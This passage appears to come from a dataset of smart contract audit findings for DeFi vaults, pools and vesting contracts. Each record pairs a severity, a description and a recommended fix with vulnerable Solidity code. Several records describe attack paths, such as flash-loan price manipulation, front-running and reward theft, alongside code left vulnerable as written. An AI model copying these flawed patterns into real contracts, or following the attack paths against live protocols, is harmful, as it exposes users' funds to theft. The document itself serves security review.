margin fee\\n // when we increase position, fee always got deducted from collateral\\n collateralDelta += _getPositionFee(currentPos.size, sizeDelta, currentPos.entryFundingRate);\\n```\\n -small LP providers may be unable to withdraw their depositsчmediumчIn LiquidityPool's initiateWithdraw(), it's required that withdrawn value is 
above a minimum parameter, or that withdrawn tokens is above the minimum parameter.\\n```\\n if (withdrawalValue < lpParams.minDepositWithdraw && \\n amountLiquidityToken < lpParams.minDepositWithdraw) {\\n revert MinimumWithdrawNotMet(address(this), withdrawalValue, lpParams.minDepositWithdraw);\\n }\\n```\\n\\nThe issue is that minDepositWithdraw is measured in dollars while amountLiquidityToken is LP tokens. The intention was that if LP tokens lost value and a previous deposit is now worth less than minDepositWithdraw, it would still be withdrawable. However, the current implementation doesn't check for that correctly, since the LP to dollar exchange rate at deposit time is not known, and is practically being hardcoded as 1:1 here. The impact is that users may not be able to withdraw LP with the token amount that was above the minimum at deposit time, or vice versaчConsider calculating an average exchange rate at which users have minted and use it to verify withdrawal amount is satisfactory.чч```\\n if (withdrawalValue < lpParams.minDepositWithdraw && \\n amountLiquidityToken < lpParams.minDepositWithdraw) {\\n revert MinimumWithdrawNotMet(address(this), withdrawalValue, lpParams.minDepositWithdraw);\\n }\\n```\\n -base to quote swaps trust GMX-provided minPrice and maxPrice to be correct, which may be manipulatedчmediumчexchangeFromExactBase() in GMXAdapter converts an amount of base to quote. It implements slippage protection by using the GMX vault's getMinPrice() and getMaxPrice() utilities. However, such protection is insufficient because GMX prices may be manipulated. Indeed, GMX supports “AMM pricing” mode where quotes are calculated from Uniswap reserves. A possible attack would be to drive up the base token (e.g. ETH) price, sell a large ETH amount to the GMXAdapter, and repay the flashloan used for manipulation. 
exchangeFromExactBase() is attacker-reachable from LiquidityPool's exchangeBase().\\n```\\n uint tokenInPrice = _getMinPrice(address(baseAsset));\\n uint tokenOutPrice = _getMaxPrice(address(quoteAsset));\\n // rest of code\\n uint minOut = tokenInPrice\\n .multiplyDecimal(marketPricingParams[_optionMarket].minReturnPercent)\\n .multiplyDecimal(_amountBase)\\n .divideDecimal(tokenOutPrice);\\n```\\nчVerify `getMinPrice()`, `getMaxPrice()` outputs are close to Chainlink-provided prices as done in `getSpotPriceForMarket()`.чч```\\n uint tokenInPrice = _getMinPrice(address(baseAsset));\\n uint tokenOutPrice = _getMaxPrice(address(quoteAsset));\\n // rest of code\\n uint minOut = tokenInPrice\\n .multiplyDecimal(marketPricingParams[_optionMarket].minReturnPercent)\\n .multiplyDecimal(_amountBase)\\n .divideDecimal(tokenOutPrice);\\n```\\n -recoverFunds() does not handle popular ERC20 tokens like BNBчmediumчrecoverFunds() is used for recovery in case of mistakenly-sent tokens. However, it uses unsafe transfer to send tokens back, which will not support 100s of non-compatible ERC20 tokens. Therefore it is likely unsupported tokens will be unrecoverable.\\n```\\n if (token == quoteAsset || token == baseAsset || token == weth) {\\n revert CannotRecoverRestrictedToken(address(this));\\n }\\n token.transfer(recipient, token.balanceOf(address(this)));\\n```\\nчUse Open Zeppelin's SafeERC20 encapsulation of ERC20 transfer functions.чч```\\n if (token == quoteAsset || token == baseAsset || token == weth) {\\n revert CannotRecoverRestrictedToken(address(this));\\n }\\n token.transfer(recipient, token.balanceOf(address(this)));\\n```\\n -setPositionRouter leaks approval to previous positionRouterчlowчpositionRouter is used to change GMX positions in GMXFuturesPoolHedger. It can be replaced by a new router if GMX redeploys, for example if a bug is found or the previous one is hacked. The new positionRouter receives approval from the contract. 
However, approval to the previous positionRouter is not revoked.\\n```\\n function setPositionRouter(IPositionRouter _positionRouter) external onlyOwner {\\n positionRouter = _positionRouter;\\n router.approvePlugin(address(positionRouter));\\n emit PositionRouterSet(_positionRouter);\\n }\\n```\\n\\nA number of unlikely, yet dire scenarios could occur.чUse router.denyPlugin() to remove privileges from the previous positionRouter.чч```\\n function setPositionRouter(IPositionRouter _positionRouter) external onlyOwner {\\n positionRouter = _positionRouter;\\n router.approvePlugin(address(positionRouter));\\n emit PositionRouterSet(_positionRouter);\\n }\\n```\\n -PoolHedger can receive ETH directly from anyoneчlowчA `receive()` function has been added to GMXFuturesPoolHedger, so that it is able to receive ETH from GMX as request refunds. However, it is not advisable to have an open `receive()` function if it is not necessary. Users may wrongly send ETH directly to PoolHedger and lose it forever.\\n```\\n receive() external payable {}\\n```\\nчAdd a msg.sender check in the receive() function, and make sure sender is positionRouter.чч```\\n receive() external payable {}\\n```\\n -Attacker can freeze profit withdrawals from V3 vaultsчhighчUsers of Ninja can use Vault's `withdrawProfit()` to withdraw profits. It starts with the following check:\\n```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n\\nIf attacker can front-run user's `withdrawProfit()` TX and set lastProfitTime to block.timestamp, they would effectively freeze the user's yield. That is indeed possible using the Vault paired strategy's `harvest()` function. It is permissionless and calls `_harvestCore()`. The attack path is shown in bold.\\n```\\n function harvest() external override whenNotPaused returns (uint256 callerFee) {\\n require(lastHarvestTimestamp != block.timestamp);\\n uint256 harvestSeconds = lastHarvestTimestamp > 0 ? 
block.timestamp \\n - lastHarvestTimestamp : 0;\\n lastHarvestTimestamp = block.timestamp;\\n uint256 sentToVault;\\n uint256 underlyingTokenCount;\\n (callerFee, underlyingTokenCount, sentToVault) = _harvestCore();\\n emit StrategyHarvest(msg.sender, underlyingTokenCount, \\n harvestSeconds, sentToVault);\\n }\\n```\\n\\n```\\n function _harvestCore() internal override returns (uint256 callerFee, uint256 underlyingTokenCount, uint256 sentToVault)\\n {\\n IMasterChef(SPOOKY_SWAP_FARM_V2).deposit(POOL_ID, 0);\\n _swapFarmEmissionTokens();\\n callerFee = _chargeFees();\\n underlyingTokenCount = balanceOf();\\n sentToVault = _sendYieldToVault();\\n } \\n```\\n\\n```\\n function _sendYieldToVault() internal returns (uint256 sentToVault) {\\n sentToVault = IERC20Upgradeable(USDC).balanceOf(address(this));\\n if (sentToVault > 0) {\\n IERC20Upgradeable(USDC).approve(vault, sentToVault);\\n IVault(vault).depositProfitTokenForUsers(sentToVault);\\n }\\n }\\n```\\n\\n```\\n function depositProfitTokenForUsers(uint256 _amount) external nonReentrant {\\n if (_amount == 0) {\\n revert NYProfitTakingVault__ZeroAmount();\\n }\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n if (msg.sender != strategy) {\\n revert NYProfitTakingVault__OnlyStrategy();\\n }\\n uint256 totalShares = totalSupply();\\n if (totalShares == 0) {\\n lastProfitTime = block.timestamp;\\n return;\\n }\\n accProfitTokenPerShare += ((_amount * PROFIT_TOKEN_PER_SHARE_PRECISION) / totalShares);\\n lastProfitTime = block.timestamp;\\n // Now pull in the tokens (Should have permission)\\n // We only want to pull the tokens with accounting\\n profitToken.transferFrom(strategy, address(this), _amount);\\n emit ProfitReceivedFromStrategy(_amount);\\n }\\n```\\nчDo not prevent profit withdrawals during lastProfitTime block.чч```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n -Lack of child 
rewarder reserves could lead to freeze of fundsчhighчIn ComplexRewarder.sol, `onReward()` is used to distribute rewards for previous time period, using the complex rewarder and any child rewarders. If the complex rewarder does not have enough tokens to hand out the reward, it correctly stores the rewards owed in storage. However, child rewarded will attempt to hand out the reward and may revert:\\n```\\n function onReward(uint _pid, address _user, address _to, uint, uint _amt) external override onlyParent nonReentrant {\\n PoolInfo memory pool = updatePool(_pid);\\n if (pool.lastRewardTime == 0) return;\\n UserInfo storage user = userInfo[_pid][_user];\\n uint pending;\\n if (user.amount > 0) {\\n pending = ((user.amount * pool.accRewardPerShare) / ACC_TOKEN_PRECISION) - user.rewardDebt;\\n rewardToken.safeTransfer(_to, pending);\\n }\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / \\n ACC_TOKEN_PRECISION;\\n emit LogOnReward(_user, _pid, pending, _to);\\n }\\n```\\n\\nImportantly, if the child rewarder fails, the parent's `onReward()` reverts too:\\n```\\n uint len = childrenRewarders.length();\\n for (uint i = 0; i < len; ) {\\n IRewarder(childrenRewarders.at(i)).onReward(_pid, _user, _to, 0, \\n _amt);\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nIn the worst-case scenario, this will lead the user's `withdraw()` call to V3 Vault, to revert.чIntroduce sufficient exception handling in the CompexRewarder.sol contract, so that `onReward()` would never fail.чч```\\n function onReward(uint _pid, address _user, address _to, uint, uint _amt) external override onlyParent nonReentrant {\\n PoolInfo memory pool = updatePool(_pid);\\n if (pool.lastRewardTime == 0) return;\\n UserInfo storage user = userInfo[_pid][_user];\\n uint pending;\\n if (user.amount > 0) {\\n pending = ((user.amount * pool.accRewardPerShare) / ACC_TOKEN_PRECISION) - user.rewardDebt;\\n rewardToken.safeTransfer(_to, pending);\\n }\\n user.amount = _amt;\\n user.rewardDebt 
= (_amt * pool.accRewardPerShare) / \\n ACC_TOKEN_PRECISION;\\n emit LogOnReward(_user, _pid, pending, _to);\\n }\\n```\\n -Wrong accounting of user's holdings allows theft of rewardчhighчIn `deposit()`, `withdraw()` and `withdrawProfit()`, `rewarder.onReward()` is called for reward bookkeeping. It will transfer previous eligible rewards and update the current amount user has:\\n```\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / ACC_TOKEN_PRECISION;\\n user.rewardsOwed = rewardsOwed;\\n```\\n\\nIn `withdraw()`, there is a critical issue where `onReward()` is called too early:\\n```\\n // Update rewarder for this user\\n if (address(rewarder) != address(0)) {\\n rewarder.onReward(0, msg.sender, msg.sender, pending, user.amount);\\n }\\n // Burn baby burn\\n _burn(msg.sender, _shares);\\n // User accounting\\n uint256 userAmount = balanceOf(msg.sender);\\n // - Underlying (Frontend ONLY)\\n if (userAmount == 0) {\\n user.amount = 0;\\n } else {\\n user.amount -= r;\\n }\\n```\\n\\nThe new _amt which will be stored in reward contract's user.amount is vault's user.amount, before decrementing the withdrawn amount. Therefore, the withdrawn amount is still gaining rewards even though it's no longer in the contract. Effectively it is stealing the rewards of others, leading to reward insolvency. In order to exploit this flaw, attacker will deposit a larger amount and immediately withdraw it, except for one wei. 
When they would like to receive the rewards accrued for others, they will withdraw the remaining wei, which will trigger `onReward()`, which will calculate and send pending awards for the previously withdrawn amount.чMove the `onReward()` call to after user.amount is updated.чч```\\n user.amount = _amt;\\n user.rewardDebt = (_amt * pool.accRewardPerShare) / ACC_TOKEN_PRECISION;\\n user.rewardsOwed = rewardsOwed;\\n```\\n -Unsafe transferFrom breaks compatibility with 100s of ERC20 tokensчmediumчIn Ninja vaults, the delegated strategy sends profit tokens to the vault using `depositProfitTokenForUsers()`. The vault transfers the tokens in using:\\n```\\n // Now pull in the tokens (Should have permission)\\n // We only want to pull the tokens with accounting\\n profitToken.transferFrom(strategy, address(this), _amount);\\n emit ProfitReceivedFromStrategy(_amount);\\n```\\n\\nThe issue is that the code doesn't use the `safeTransferFrom()` utility from SafeERC20. Therefore, profitTokens that don't return a bool in `transferFrom()` will cause a revert which means they are stuck in the strategy. Examples of such tokens are USDT, BNB, among hundreds of other tokens.чUse `safeTransferFrom()` from SafeERC20.solчч```\\n // Now pull in the tokens (Should have permission)\\n // We only want to pull the tokens with accounting\\n profitToken.transferFrom(strategy, address(this), _amount);\\n emit ProfitReceivedFromStrategy(_amount);\\n```\\n -Attacker can force partial withdrawals to failчmediumчIn Ninja vaults, users call `withdraw()` to take back their deposited tokens. 
There is bookkeeping on remaining amount:\\n```\\n uint256 userAmount = balanceOf(msg.sender);\\n // - Underlying (Frontend ONLY)\\n if (userAmount == 0) {\\n user.amount = 0;\\n } else {\\n user.amount -= r;\\n }\\n```\\n\\nIf the withdraw is partial (some tokens are left), user.amount is decremented by r.\\n```\\n uint256 r = (balance() * _shares) / totalSupply();\\n```\\n\\nAbove, r is calculated as the relative share of the user's _shares of the total balance kept in the vault.\\nWe can see that user.amount is incremented in deposit().\\n```\\n function deposit(uint256 _amount) public nonReentrant {\\n …\\n user.amount += _amount;\\n …\\n }\\n```\\n\\nThe issue is that the calculated r can be more than _amount , causing an overflow in `withdraw()` and freezing the withdrawal. All attacker needs to do is send a tiny amount of underlying token directly to the contract, to make the shares go out of sync.чRedesign user structure, taking into account that balance of underlying can be externally manipulatedчч```\\n uint256 userAmount = balanceOf(msg.sender);\\n // - Underlying (Frontend ONLY)\\n if (userAmount == 0) {\\n user.amount = 0;\\n } else {\\n user.amount -= r;\\n }\\n```\\n -Rewards may be stuck due to unchangeable slippage parameterчmediumчIn NyPtvFantomWftmBooSpookyV2StrategyToUsdc.sol, MAX_SLIPPAGE is used to limit slippage in trades of BOO tokens to USDC, for yield:\\n```\\n function _swapFarmEmissionTokens() internal { IERC20Upgradeable boo = IERC20Upgradeable(BOO);\\n uint256 booBalance = boo.balanceOf(address(this));\\n if (booToUsdcPath.length < 2 || booBalance == 0) {\\n return;\\n }\\n boo.safeIncreaseAllowance(SPOOKY_ROUTER, booBalance);\\n uint256[] memory amounts = \\n IUniswapV2Router02(SPOOKY_ROUTER).getAmountsOut(booBalance, booToUsdcPath);\\n uint256 amountOutMin = (amounts[amounts.length - 1] * MAX_SLIPPAGE) / PERCENT_DIVISOR;\\n IUniswapV2Router02(SPOOKY_ROUTER).swapExactTokensForTokensSupportingFeeOnTransferTokens( booBalance, 
amountOutMin, booToUsdcPath, address(this), block.timestamp );\\n }\\n```\\n\\nIf slippage is not satisfied the entire transaction reverts. Since MAX_SLIPPAGE is constant, it is possible that harvesting of the strategy will be stuck, due to operations leading to too high of a slippage. For example, strategy might accumulate a large amount of BOO, or `harvest()` can be sandwich-attacked.чAllow admin to set slippage after some timelock period.чч```\\n function _swapFarmEmissionTokens() internal { IERC20Upgradeable boo = IERC20Upgradeable(BOO);\\n uint256 booBalance = boo.balanceOf(address(this));\\n if (booToUsdcPath.length < 2 || booBalance == 0) {\\n return;\\n }\\n boo.safeIncreaseAllowance(SPOOKY_ROUTER, booBalance);\\n uint256[] memory amounts = \\n IUniswapV2Router02(SPOOKY_ROUTER).getAmountsOut(booBalance, booToUsdcPath);\\n uint256 amountOutMin = (amounts[amounts.length - 1] * MAX_SLIPPAGE) / PERCENT_DIVISOR;\\n IUniswapV2Router02(SPOOKY_ROUTER).swapExactTokensForTokensSupportingFeeOnTransferTokens( booBalance, amountOutMin, booToUsdcPath, address(this), block.timestamp );\\n }\\n```\\n -potential overflow in reward accumulator may freeze functionalityчmediumчNote the above description of `updatePool()` functionality. 
We can see that accRewardPerShare is only allocated 128 bits in PoolInfo:\\n```\\n struct PoolInfo {\\n uint128 accRewardPerShare;\\n uint64 lastRewardTime;\\n uint64 allocPoint;\\n```\\n\\nTherefore, even if truncation issues do not occur, it is likely that continuous incrementation of the counter would cause accRewardPerShare to overflow, which would freeze vault functionalities such as withdrawal.чSteal 32 bits from lastRewardTime and 32 bits from allocPoint to make the accumulator have 192 bits, which should be enough for safe calculations.чч```\\n struct PoolInfo {\\n uint128 accRewardPerShare;\\n uint64 lastRewardTime;\\n uint64 allocPoint;\\n```\\n -when using fee-on-transfer tokens in VaultV3, capacity is limited below underlyingCapчlowчVault V3 documentation states it accounts properly for fee-on-transfer tokens. It calculates actual transferred amount as below:\\n```\\n uint256 _pool = balance();\\n if (_pool + _amount > underlyingCap) {\\n revert NYProfitTakingVault__UnderlyingCapReached(underlyingCap);\\n }\\n uint256 _before = underlying.balanceOf(address(this));\\n underlying.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 _after = underlying.balanceOf(address(this));\\n _amount = _after - _before;\\n```\\n\\nA small issue is that underlyingCap is compared to the _amount before correction for actual transferred amount. 
Therefore, it cannot actually be reached, and limits the maximum capacity of the vault to underlyingCap minus a factor of the fee %.чMove the underlyingCap check to below the effective _amount calculationчч```\\n uint256 _pool = balance();\\n if (_pool + _amount > underlyingCap) {\\n revert NYProfitTakingVault__UnderlyingCapReached(underlyingCap);\\n }\\n uint256 _before = underlying.balanceOf(address(this));\\n underlying.safeTransferFrom(msg.sender, address(this), _amount);\\n uint256 _after = underlying.balanceOf(address(this));\\n _amount = _after - _before;\\n```\\n -Redundant checks in Vault V3чlowч`depositProfitTokenForUsers()` and `withdrawProfit()` contain the following check:\\n```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n\\nHowever, lastProfitTime is only ever set to block.timestamp. Therefore, it can never be larger than block.timestamp.чIt would be best in terms of gas costs and logical clarity to change the comparison to !=чч```\\n if (block.timestamp <= lastProfitTime) {\\n revert NYProfitTakingVault__ProfitTimeOutOfBounds();\\n }\\n```\\n -createUniswapRangeOrder() charges manager instead of poolчhighч_createUniswapRangeOrder() can be called either from manager flow, with createUniswapRangeOrder(), or pool-induced from hedgeDelta(). The issue is that the function assumes the sender is the parentLiquidityPool, for example:\\n```\\n if (inversed && balance < amountDesired) {\\n // collat = 0\\n uint256 transferAmount = amountDesired - balance;\\n uint256 parentPoolBalance = \\n ILiquidityPool(parentLiquidityPool).getBalance(address(token0));\\n if (parentPoolBalance < transferAmount) { revert \\n CustomErrors.WithdrawExceedsLiquidity(); \\n }\\n SafeTransferLib.safeTransferFrom(address(token0), msg.sender, \\n address(this), transferAmount);\\n } \\n```\\n\\nBalance check is done on pool, but money is transferred from sender. 
It will cause the order to use manager's funds.\\n```\\n function createUniswapRangeOrder(\\n RangeOrderParams calldata params,\\n uint256 amountDesired\\n ) external {\\n require(!_inActivePosition(), \"RangeOrder: active position\");\\n _onlyManager();\\n bool inversed = collateralAsset == address(token0);\\n _createUniswapRangeOrder(params, amountDesired, inversed);\\n }\\n```\\nчEnsure safeTransfer from uses parentLiquidityPool as source.чч```\\n if (inversed && balance < amountDesired) {\\n // collat = 0\\n uint256 transferAmount = amountDesired - balance;\\n uint256 parentPoolBalance = \\n ILiquidityPool(parentLiquidityPool).getBalance(address(token0));\\n if (parentPoolBalance < transferAmount) { revert \\n CustomErrors.WithdrawExceedsLiquidity(); \\n }\\n SafeTransferLib.safeTransferFrom(address(token0), msg.sender, \\n address(this), transferAmount);\\n } \\n```\\n -hedgeDelta() priceToUse is calculated wrong, which causes bad hedgesчhighчWhen _delta parameter is negative for `hedgeDelta()`, priceToUse will be the minimum between quotePrice and underlyingPrice.\\n```\\n // buy wETH\\n // lowest price is best price when buying\\n uint256 priceToUse = quotePrice < underlyingPrice ? quotePrice : \\n underlyingPrice;\\n RangeOrderDirection direction = inversed ? RangeOrderDirection.ABOVE \\n : RangeOrderDirection.BELOW;\\n RangeOrderParams memory rangeOrder = \\n _getTicksAndMeanPriceFromWei(priceToUse, direction);\\n```\\n\\nThis works fine when direction is BELOW, because the calculated lowerTick and upperTick from _getTicksAndMeanPriceFromWei are guaranteed to be lower than current price.\\n```\\n int24 lowerTick = direction == RangeOrderDirection.ABOVE ? \\n nearestTick + tickSpacing : nearestTick - (2 * tickSpacing);\\n int24 tickUpper = direction ==RangeOrderDirection.ABOVE ? lowerTick + \\n tickSpacing : nearestTick - tickSpacing;\\n```\\n\\nTherefore, the fulfill condition is not true and we mint from the correct base. 
However, when direction is ABOVE, it is possible that the oracle supplied price (underlyingPrice) is low enough in comparison to pool price, that the fulfill condition is already active. In that case, the contract tries to mint from the wrong asset which will cause the wrong tokens to be sent in. In effect, the contract is not hedging. A similar situation occurs when _delta parameter is greater than zero.чVerify the calculated priceToUse is on the same side as pool-calculated tick price.чч```\\n // buy wETH\\n // lowest price is best price when buying\\n uint256 priceToUse = quotePrice < underlyingPrice ? quotePrice : \\n underlyingPrice;\\n RangeOrderDirection direction = inversed ? RangeOrderDirection.ABOVE \\n : RangeOrderDirection.BELOW;\\n RangeOrderParams memory rangeOrder = \\n _getTicksAndMeanPriceFromWei(priceToUse, direction);\\n```\\n -multiplication overflow in getPoolPrice() likelyчmediumч`getPoolPrice()` is used in hedgeDelta to get the price directly from Uniswap v3 pool:\\n```\\n function getPoolPrice() public view returns (uint256 price, uint256 \\n inversed){\\n (uint160 sqrtPriceX96, , , , , , ) = pool.slot0();\\n uint256 p = uint256(sqrtPriceX96) * uint256(sqrtPriceX96) * (10 \\n ** token0.decimals());\\n // token0/token1 in 1e18 format\\n price = p / (2 ** 192);\\n inversed = 1e36 / price;\\n }\\n```\\n\\nThe issue is that calculation of p is likely to overflow. 
sqrtPriceX96 has 96 bits for decimals, 10** `token0.decimals()` will have 60 bits when decimals is 18, therefore there is only (256 - 2 * 96 - 60) / 2 = 2 bits for non-decimal part of sqrtPriceX96.чConsider converting the sqrtPrice to a 60x18 format and performing arithmetic operations using the PRBMathUD60x18 library.чч```\\n function getPoolPrice() public view returns (uint256 price, uint256 \\n inversed){\\n (uint160 sqrtPriceX96, , , , , , ) = pool.slot0();\\n uint256 p = uint256(sqrtPriceX96) * uint256(sqrtPriceX96) * (10 \\n ** token0.decimals());\\n // token0/token1 in 1e18 format\\n price = p / (2 ** 192);\\n inversed = 1e36 / price;\\n }\\n```\\n -Hedging won't work if token1.decimals() < token0.decimals()чmediumч`tickToToken0PriceInverted()` performs some arithmetic calculations. It's called by `_getTicksAndMeanPriceFromWei()`, which is called by `hedgeDelta()`. This line can overflow:\\n```\\n uint256 intermediate = inWei.div(10**(token1.decimals() -\\n token0.decimals()));\\n```\\n\\nAlso, this line would revert even if the above calculation was done correctly:\\n```\\n meanPrice = OptionsCompute.convertFromDecimals(meanPrice, \\n token0.decimals(), token1.decimals());\\n```\\n\\n```\\n function convertFromDecimals(uint256 value, uint8 decimalsA, uint8 decimalsB) internal pure\\n returns (uint256) {\\n if (decimalsA > decimalsB) {\\n revert();\\n }\\n …\\n```\\n\\nThe impact is that when `token1.decimals()` < `token0.decimals()`, the contract's main function is unusable.чRefactor the calculation to support different decimals combinations. Additionally, add more comprehensive tests to detect similar issues in the future.чч```\\n uint256 intermediate = inWei.div(10**(token1.decimals() -\\n token0.decimals()));\\n```\\n -Overflow danger in _sqrtPriceX96ToUintчmediumч_sqrtPriceX96ToUint will only work when the non-fractional component of sqrtPriceX96 takes up to 32 bits. This represents a price ratio of 18446744073709551616. 
With different token digits it is not unlikely that this ratio will be crossed which will make hedgeDelta() revert.\\n```\\n function _sqrtPriceX96ToUint(uint160 sqrtPriceX96) private pure returns (uint256)\\n {\\n uint256 numerator1 = uint256(sqrtPriceX96) * \\n uint256(sqrtPriceX96);\\n return FullMath.mulDiv(numerator1, 1, 1 << 192);\\n }\\n```\\nчPerform the multiplication after converting the numbers to 60x18 variablesчч```\\n function _sqrtPriceX96ToUint(uint160 sqrtPriceX96) private pure returns (uint256)\\n {\\n uint256 numerator1 = uint256(sqrtPriceX96) * \\n uint256(sqrtPriceX96);\\n return FullMath.mulDiv(numerator1, 1, 1 << 192);\\n }\\n```\\n -Insufficient dust checksчlowчIn `hedgeDelta()`, there is a dust check in the case of sell wETH order:\\n```\\n // sell wETH\\n uint256 wethBalance = inversed ? amount1Current : amount0Current;\\n if (wethBalance < minAmount) return 0;\\n```\\n\\nHowever, the actual used amount is _delta\\n```\\n uint256 deltaToUse = _delta > int256(wethBalance) ? wethBalance : \\n uint256(_delta);\\n _createUniswapRangeOrder(rangeOrder, deltaToUse, inversed);\\n```\\n\\nThe check should be applied on deltaToUse rather than wethBalance because it will be the minimum of wethBalance and _delta. Additionally, there is no corresponding check for minting with collateral in case _delta is negative.чCorrect current dust checks and add them also in the if clause.чч```\\n // sell wETH\\n uint256 wethBalance = inversed ? amount1Current : amount0Current;\\n if (wethBalance < minAmount) return 0;\\n```\\n -Linear vesting users may not receive vested amountчhighчTokenTransmuter supports two types of transmutations, linear and instant. In linear, allocated amount is released across time until fully vested, while in instant the entire amount is released immediately. 
transmuteLinear() checks that there is enough output tokens left in the contract before accepting transfer of input tokens.\\n```\\n require(IERC20(outputTokenAddress).balanceOf(address(this)) >= \\n (totalAllocatedOutputToken - totalReleasedOutputToken), \\n \"INSUFFICIENT_OUTPUT_TOKEN\");\\n IERC20(inputTokenAddress).transferFrom(msg.sender, address(0), \\n _inputTokenAmount);\\n```\\n\\nHowever, `transmuteInstant()` lacks any remaining balance checks, and will operate as long as the function has enough output tokens to satisfy the request.\\n```\\n IERC20(inputTokenAddress).transferFrom(msg.sender, address(0), \\n _inputTokenAmount);\\n SafeERC20.safeTransfer(IERC20(outputTokenAddress), msg.sender, \\n allocation);\\n emit OutputTokenInstantReleased(msg.sender, allocation, \\n outputTokenAddress);\\n```\\n\\nAs a result, it is not ensured that tokens that have been reserved for linear distribution will be available when users request to claim them. An attacker may empty the output balance with a large instant transmute and steal future vested tokens of users.чIn transmuteInstant, add a check similar to the one in transmuteLinear. It will ensure allocations are kept faithfully.чч```\\n require(IERC20(outputTokenAddress).balanceOf(address(this)) >= \\n (totalAllocatedOutputToken - totalReleasedOutputToken), \\n \"INSUFFICIENT_OUTPUT_TOKEN\");\\n IERC20(inputTokenAddress).transferFrom(msg.sender, address(0), \\n _inputTokenAmount);\\n```\\n -Multiplier implementation causes limited functionalityчlowчlinearMultiplier and instantMultiplier are used to calculate output token amount from input token amount in transmute functions.\\n```\\n uint256 allocation = (_inputTokenAmount * linearMultiplier) / \\n tokenDecimalDivider;\\n …\\n uint256 allocation = (_inputTokenAmount * instantMultiplier) / \\n tokenDecimalDivider;\\n```\\n\\nThe issue is that they are uint256 variables and can only multiply _inputTokenAmount, not divide it. 
It results in limited functionality of the protocol as vesting pairs where output tokens are valued more than input tokens cannot be used.чAdd a boolean state variable which will describe whether to multiply or divide by the multiplier.чч```\\n uint256 allocation = (_inputTokenAmount * linearMultiplier) / \\n tokenDecimalDivider;\\n …\\n uint256 allocation = (_inputTokenAmount * instantMultiplier) / \\n tokenDecimalDivider;\\n```\\n -Empty orders do not request from oracle and during settlement they use an invalid oracle version with `price=0` which messes up a lot of fees and funding accounting leading to loss of funds for the makersчhighчWhen `market.update` which doesn't change user's position is called, a new (current) global order is created, but the oracle version is not requested due to empty order. This means that during the order settlement, it will use non-existent invalid oracle version with `price = 0`. This price is then used to accumulate all the data in this invalid `Version`, meaning accounting is done using `price = 0`, which is totally incorrect.
For instance, all funding and fees calculations multiply by oracle version's price, thus all time periods between empty order and the next valid oracle version will not accumulate any fees, which is funds usually lost by makers (as makers won't receive fees/funding for the risk they take).\\nWhen `market.update` is called, it requests a new oracle version at the current order's timestamp unless the order is empty:\\n```\\n// request version\\nif (!newOrder.isEmpty()) oracle.request(IMarket(this), account);\\n```\\n\\nThe order is empty when it doesn't modify user position:\\n```\\nfunction isEmpty(Order memory self) internal pure returns (bool) {\\n return pos(self).isZero() && neg(self).isZero();\\n}\\n\\nfunction pos(Order memory self) internal pure returns (UFixed6) {\\n return self.makerPos.add(self.longPos).add(self.shortPos);\\n}\\n\\nfunction neg(Order memory self) internal pure returns (UFixed6) {\\n return self.makerNeg.add(self.longNeg).add(self.shortNeg);\\n}\\n```\\n\\nLater, when a valid oracle version is commited, during the settlement process, oracle version at the position is used:\\n```\\nfunction _processOrderGlobal(\\n Context memory context,\\n SettlementContext memory settlementContext,\\n uint256 newOrderId,\\n Order memory newOrder\\n) private {\\n // @audit no oracle version at this timestamp, thus it's invalid with `price=0`\\n OracleVersion memory oracleVersion = oracle.at(newOrder.timestamp); \\n\\n context.pending.global.sub(newOrder);\\n // @audit order is invalidated (it's already empty anyway), but the `price=0` is still used everywhere\\n if (!oracleVersion.valid) newOrder.invalidate();\\n\\n VersionAccumulationResult memory accumulationResult;\\n (settlementContext.latestVersion, context.global, accumulationResult) = VersionLib.accumulate(\\n settlementContext.latestVersion,\\n context.global,\\n context.latestPosition.global,\\n newOrder,\\n settlementContext.orderOracleVersion,\\n oracleVersion, // @audit <<< when oracleVersion is 
invalid, the `price=0` will still be used here\\n context.marketParameter,\\n context.riskParameter\\n );\\n// rest of code\\n```\\n\\nIf the oracle version is invalid, the order is invalidated, but the `price=0` is still used to accumulate. It doesn't affect pnl from price move, because the final oracle version is always valid, thus the correct price is used to evaluate all possible account actions, however it does affect accumulated fees and funding:\\n```\\nfunction _accumulateLinearFee(\\n Version memory next,\\n AccumulationContext memory context,\\n VersionAccumulationResult memory result\\n) private pure {\\n (UFixed6 makerLinearFee, UFixed6 makerSubtractiveFee) = _accumulateSubtractiveFee(\\n context.riskParameter.makerFee.linear(\\n Fixed6Lib.from(context.order.makerTotal()),\\n context.toOracleVersion.price.abs() // @audit <<< price == 0 for invalid oracle version\\n ),\\n context.order.makerTotal(),\\n context.order.makerReferral,\\n next.makerLinearFee\\n );\\n// rest of code\\n // Compute long-short funding rate\\n Fixed6 funding = context.global.pAccumulator.accumulate(\\n context.riskParameter.pController,\\n toSkew.unsafeDiv(Fixed6Lib.from(context.riskParameter.takerFee.scale)).min(Fixed6Lib.ONE).max(Fixed6Lib.NEG_ONE),\\n context.fromOracleVersion.timestamp,\\n context.toOracleVersion.timestamp,\\n context.fromPosition.takerSocialized().mul(context.fromOracleVersion.price.abs()) // @audit <<< price == 0 for invalid oracle version\\n );\\n// rest of code\\nfunction _accumulateInterest(\\n Version memory next,\\n AccumulationContext memory context\\n) private pure returns (Fixed6 interestMaker, Fixed6 interestLong, Fixed6 interestShort, UFixed6 interestFee) {\\n // @audit price = 0 and notional = 0 for invalid oracle version\\n UFixed6 notional = context.fromPosition.long.add(context.fromPosition.short).min(context.fromPosition.maker).mul(context.fromOracleVersion.price.abs());\\n// rest of code\\n```\\n\\nAs can be seen, all funding and fees 
